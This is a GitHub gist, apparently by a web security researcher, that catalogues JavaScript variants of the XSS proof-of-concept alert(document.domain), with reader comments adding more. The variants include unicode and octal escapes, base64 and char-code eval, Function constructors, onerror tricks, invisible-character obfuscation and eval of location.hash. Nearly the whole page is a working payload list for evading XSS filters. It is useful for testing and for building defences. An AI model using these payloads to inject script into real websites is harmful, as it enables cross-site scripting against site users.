-
-
Save tomnomnom/14a918f707ef0685fdebd90545580309 to your computer and use it in GitHub Desktop.
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); | |
| top['alert'](document.domain); | |
| top[8680439..toString(30)](document.domain); | |
| top[/alert/.source](document.domain); | |
| alert(this['document']['domain']); | |
| // Indirect Invocation | |
| alert.call(null, document.domain); | |
| alert.apply(null, [document.domain]); | |
| alert.bind()(document.domain); | |
| Reflect.apply(alert, null, [document.domain]); | |
| alert.valueOf()(document.domain); | |
| with(document) alert(domain); | |
| Promise.all([document.domain]).then(alert); | |
| document.domain.replace(/.*/, alert); | |
| // Array methods | |
| [document.domain].find(alert); | |
| [document.domain].findIndex(alert); | |
| [document.domain].filter(alert); | |
| [document.domain].every(alert); | |
| [document.domain].forEach(alert); | |
| // Alternate array syntax (all array methods apply) | |
| Array(document.domain).find(alert); | |
| Array.of(document.domain).find(alert); | |
| (new Array(document.domain)).find(alert); | |
| // Other Datastructure Methods | |
| (new Map()).set(1, document.domain).forEach(alert); | |
| (new Set([document.domain])).forEach(alert); | |
| // Evaluated | |
| eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=')); | |
| eval(atob(/YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=/.source)); | |
| eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59)); | |
| setTimeout`alert\u0028document.domain\u0029`; | |
| Set.constructor`alert\x28document.domain\x29```; | |
| (new Function('alert(document.domain)'))(); | |
| (new (Object.getPrototypeOf(async function(){}).constructor)('alert(document.domain)'))(); | |
| Function('x','alert(x)')(document.domain); | |
| // Template Literal Expression | |
| `${alert(document.domain)}`; | |
| // onerror assignment | |
| onerror=alert;throw document.domain; | |
| onerror=eval;throw'=alert\x28document.domain\x29'; | |
| // With location.hash = #alert(document.domain) | |
| eval(location.hash.substr(1)) | |
Another arguably slightly different one: Function('x','alert(x)')(document.domain)
also, of the back of the "Array processors" idea, you've also got promises and chains:
Promise.all([document.domain]).then(alert)
and a reminder that document and alert are both parents of window:
alert(this['document']['domain']);
(though I don't know if that's useful information)
[a-z()]: with(document)alert(domain)
Thanks for the suggestions, @cmbuckley, @E314c, @avlidienbrunn :)
Try this one:
([,ᅠ,,,,ᅠᅠ]=[]+{},[ᅠᅠᅠ,ᅠ,ᅠᅠᅠᅠ,ᅠᅠ,,ᅠᅠᅠᅠᅠ,ᅠᅠᅠ,ᅠᅠᅠᅠᅠᅠ,,,ᅠᅠᅠᅠ]=[!!ᅠ]+!ᅠ+ᅠ.ᅠ) [ᅠᅠ+=ᅠ+ᅠᅠᅠᅠ+ᅠᅠᅠᅠᅠᅠ+ᅠᅠᅠ+ᅠ+ᅠᅠᅠᅠ+ᅠᅠ+ᅠᅠᅠ+ᅠ+ᅠ][ᅠᅠ] (ᅠᅠᅠᅠᅠ+ᅠᅠᅠ+ᅠᅠ+ᅠ+ᅠᅠᅠ+'(document.domain)')``
((((alert))))(domain)
Yep, you can do just domain instead of document.domain
@mikaelv2 Is there a good place to explain how yours works? I get that it's getting strings of internals like false, true undefined, but I'm lost as to how it accomplishes it and I'd like to know how to make my own arbitrary calls.
alert(eval('\144\157\143\165\155\145\156\164\056\144\157\155\141\151\156'))
[origin].map(alert)
not alert but what about
{prompt`${document.domain}`}
Little trivial, but there’s the alternative Array formats:
Array(document.domain),new Array(document.domain),Array.of(document.domain)